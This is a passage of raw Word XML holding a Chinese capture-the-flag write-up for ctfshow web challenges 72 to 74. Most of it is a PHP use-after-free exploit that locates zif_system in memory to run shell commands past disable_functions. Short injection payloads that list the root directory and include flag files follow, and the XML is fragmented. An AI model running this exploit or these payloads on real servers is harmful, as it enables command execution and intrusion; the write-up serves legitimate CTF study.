    <w:p w14:paraId="51772D7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$p_type  = leak($header, 0, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32655A1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$p_flags = leak($header, 4, 4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D955F5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$p_vaddr = leak($header, 0x10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B671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$p_memsz = leak($header, 0x28);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731FEFB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BAD5EE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if($p_type == 1 &amp;&amp; $p_flags == 6) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6293854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0184120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$data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCBFAE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$data_size = $p_memsz;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB9FF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} else if($p_type == 1 &amp;&amp; $p_flags == 5) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFD8D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$text_size = $p_memsz;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4679B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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307EEFD8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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68027E4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302263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if(!$data_addr || !$text_size || !$data_size)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED637C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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69667D6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4C0147F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return [$data_addr, $text_size, $data_size];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DA345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4D10FDB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20FB725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get_basic_funcs($base, $elf) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F22EC0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list($data_addr, $text_size, $data_size) = $elf;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0664605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for($i = 0; $i &lt; $data_size / 8; $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DA15F8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$leak = leak($data_addr, $i * 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1D3A8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if($leak - $base &gt; 0 &amp;&amp; $leak - $base &lt; $data_addr - $base) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E78D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$deref = leak($leak);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A69151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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D077D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if($deref != 0x746e6174736e6f63)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0EB5F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    continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E93951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} else continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C26C53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147C26A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$leak = leak($data_addr, ($i + 4) * 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8FD45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if($leak - $base &gt; 0 &amp;&amp; $leak - $base &lt; $data_addr - $base) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B505C3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$deref = leak($leak);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A3BB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2C207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if($deref != 0x786568326e6962)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F156B7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    continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FFF8D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} else continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A885FC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5187AA1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return $data_addr + $i * 8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9530B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4807285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4883EF1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83B54C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get_binary_base($binary_leak) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EEB7C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$base = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A050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$start = $binary_leak &amp; 0xfffffffffffff000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0FAD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for($i = 0; $i &lt; 0x1000; $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B73053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$addr = $start - 0x1000 * $i;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CD116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$leak = leak($addr, 0, 7);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AFD68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if($leak == 0x10102464c457f) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1953F05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return $addr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6418880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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E6E5A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474137C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0CC6FBE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426360D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get_system($basic_funcs) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B1B1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$addr = $basic_funcs;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E376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do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641B242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$f_entry = leak($addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2283D2B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$f_name = leak($f_entry, 0, 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F02EAF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5A4DDB4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if($f_name == 0x6d6574737973) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB7FA7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    return leak($addr + 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB1490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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE562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    $addr += 0x20;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E88DCD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} while($f_entry != 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7654F25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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2784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271F923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5E52055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function trigger_uaf($arg) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2F967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AB7EC7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$arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D28B3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$vuln = new Vuln();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65545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$vuln-&gt;a = $arg;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC56ED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25E5778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22E7F85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if(stristr(PHP_OS, 'WIN')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6991B17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die('This PoC is for *nix systems only.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E54988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37CCBB6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C556C98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$n_alloc = 10; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA23EF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$contiguous = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EFD13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for($i = 0; $i &lt; $n_alloc; $i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBBACE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$contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05635B6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0C20E6D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trigger_uaf('x');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F3CF4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$abc = $backtrace[1]['args'][0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435A5FD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18ACFA6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$helper = new Helper;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2450824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$helper-&gt;b = function ($x) { };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAFB34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2ABA48A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if(strlen($abc) == 79 || strlen($abc) == 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF192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die("UAF failed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240C43D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6A19A0DC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194C2A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$closure_handlers = str2ptr($abc, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541046E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$php_heap = str2ptr($abc, 0x58);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECFF38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$abc_addr = $php_heap - 0xc8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D10CD1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55CD0A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write($abc, 0x60, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B86C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write($abc, 0x70, 6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B546E5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4E1A79D5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write($abc, 0x10, $abc_addr + 0x60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDA9D3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write($abc, 0x18, 0xa);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35670CA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4B5088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$closure_obj = str2ptr($abc, 0x20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CDF78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3B92B034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$binary_leak = leak($closure_handlers, 8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0177AFB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if(!($base = get_binary_base($binary_leak))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081245A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die("Couldn't determine binary base address");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E7F89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31E5183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E76996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if(!($elf = parse_elf($base))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9AC92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die("Couldn't parse ELF header");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D778D5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55A8C3D3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19A7116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if(!($basic_funcs = get_basic_funcs($base, $elf))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034AD7D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die("Couldn't get basic_functions address");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2488227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1C23A47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CC9623E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if(!($zif_system = get_system($basic_funcs))) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73331BF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die("Couldn't get zif_system address");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1791882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5ED586D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E4C1096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0E2B1C0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$fake_obj_offset = 0xd0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125289C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for($i = 0; $i &lt; 0x110; $i += 8) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081DEC1D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    write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21585D8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BDC69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D7AD7E0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write($abc, 0x20, $abc_addr + $fake_obj_offset);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728B60D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write($abc, 0xd0 + 0x38, 1, 4); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B5DAD1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write($abc, 0xd0 + 0x68, $zif_system); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240429BA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7DC3808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($helper-&gt;b)($cmd);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5971E6E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 xml:space="preserve">    exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5D059B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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D00C7E7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</w:p>
    <w:p w14:paraId="63BDE9CF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>ctfshow("cat /flag0.txt");ob_end_flush();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39135299">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23955C71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6F192D72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4846E61E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根据提示，用uaf脚本绕过，代码不能在 Windows 上跑，要求被攻击服务器必须是类unix系统。只能把以上代码通过 url 编码，然后传递即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2C423F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="21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150" cy="1497965"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6985"/>
            <wp:docPr id="49" name="图片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9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79502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1882140"/>
            <wp:effectExtent l="0" t="0" r="635" b="381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D9E0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77E523AF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05D4AA2B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30A427F4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Web73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4127AFE2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本题没有open_basedir限制，就简单很多，不过也可以用上题的方法（uaf需要修改一下）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2A4373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使用c=var_export( scandir('/'));exit();和c=include("/flagc.txt");die();即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1341926F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0F9F0508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35607878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622331E8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57DA13E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7372DA4F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4C99DD12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Web74</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A3D99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本题没有open_basedir限制，但限制了 scandir(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70548A43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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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c=?&gt;&lt;?php $a = new DirectoryIterator("glob:///*"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E0E567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foreach ($a as $f) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418B5BE7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{ echo ($f-&gt;__toString().' '); } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556F89AE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</w:rPr>
        <w:t>exit(0); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C68DFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars="0"/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然后用c=include("/flagx.txt");exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD06F0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9865" cy="2060575"/>
            <wp:effectExtent l="0" t="0" r="6985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BA50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="210" w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="315A0173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16B29B5B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6E80D546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4F655F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B7028F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="103DE7A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0519EE76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166B989B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3032BA9E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FAC369">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E34959F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C5AE7A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E13711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494F61"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B494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7B8140D7"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7B8140D7"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="21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000AC"/>
    <w:rsid w:val="097A4477"/>
    <w:rsid w:val="0EA36093"/>
    <w:rsid w:val="158F3058"/>
    <w:rsid w:val="27BE00F6"/>
    <w:rsid w:val="2DF97FFC"/>
    <w:rsid w:val="42867CC0"/>
    <w:rsid w:val="494315DF"/>
    <w:rsid w:val="583000AC"/>
    <w:rsid w:val="5838665C"/>
    <w:rsid w:val="643028DD"/>
    <w:rsid w:val="686065CC"/>
    <w:rsid w:val="77004391"/>
    <w:rsid w:val="79297BCF"/>
    <w:rsid w:val="7D63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numbering" Target="numbering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2211</Words>
  <Characters>4678</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>1407</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4771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2025-11-21T17:46:00Z</dcterms:created>
  <dc:creator>快乐的小孩</dc:creator>
  <cp:lastModifiedBy>快乐的小孩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-06T15:23:33Z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7571B54D47354A29AE5EC3A9AD1B7D60_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiNDBmMTRhMGRmZDJlNjZiNDRmNjBmNThiMzFkZjJkYjEiLCJ1c2VySWQiOiIxNDE2ODU3NTA0In0=</vt:lpwstr>
  </property>
</Properties>
</file>